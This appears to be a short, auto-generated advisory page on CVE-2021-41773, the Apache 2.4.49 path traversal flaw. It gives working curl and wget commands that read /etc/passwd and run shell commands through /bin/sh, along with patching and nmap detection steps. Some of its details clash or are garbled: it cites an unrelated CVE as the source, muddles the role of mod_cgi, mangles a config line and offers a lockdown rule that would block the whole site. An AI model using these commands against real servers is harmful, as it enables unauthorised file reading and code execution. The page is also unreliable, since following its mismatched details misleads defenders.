How CVE-2021-41773 Works
CVE-2021-41773 is a path traversal vulnerability in Apache HTTP Server 2.4.49. The flaw occurs due to improper input validation in the URL normalization process. Attackers can exploit this by crafting malicious requests containing directory traversal sequences (../). If mod_cgi is enabled, this allows unauthorized access to files outside the web root directory. Successful exploitation may lead to remote code execution (RCE) if scripts are executable. The vulnerability stems from insufficient checks in the `ap_normalize_path()` function, which fails to block such sequences after normalization.
DailyCVE Form
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
1. Craft Malicious Request:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. Check for RCE (if mod_cgi enabled):
curl -X POST "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh" -d "echo;id"
Mitigation:
1. Patch Immediately:
sudo apt update && sudo apt upgrade apache2
2. Disable mod_cgi if unused:
LoadModule cgi_module modules/mod_cgi.so Comment this line
3. Restrict Directory Access:
<Directory "/var/www/html"> Require all denied Options -Indexes </Directory>
Detection:
1. Scan with Nmap:
nmap --script http-vuln-cve2021-41773 -p 80,443 target.com
2. Manual Verification:
wget --quiet -O - "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd" | head -n 1
Analytics:
- Affected Systems: Apache 2.4.49 (unpatched).
- Attack Vector: Remote, unauthenticated.
- Exploit Availability: Public PoCs exist.
- CVSS Score: 9.8 (Critical).
References:
- Apache Security Advisory: https://httpd.apache.org/security/CVE-2021-41773.txt
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2021-41773
References:
Reported By: https://www.cve.org/CVERecord?id=CVE-2025-31161
Extra Source Hub:
Undercode
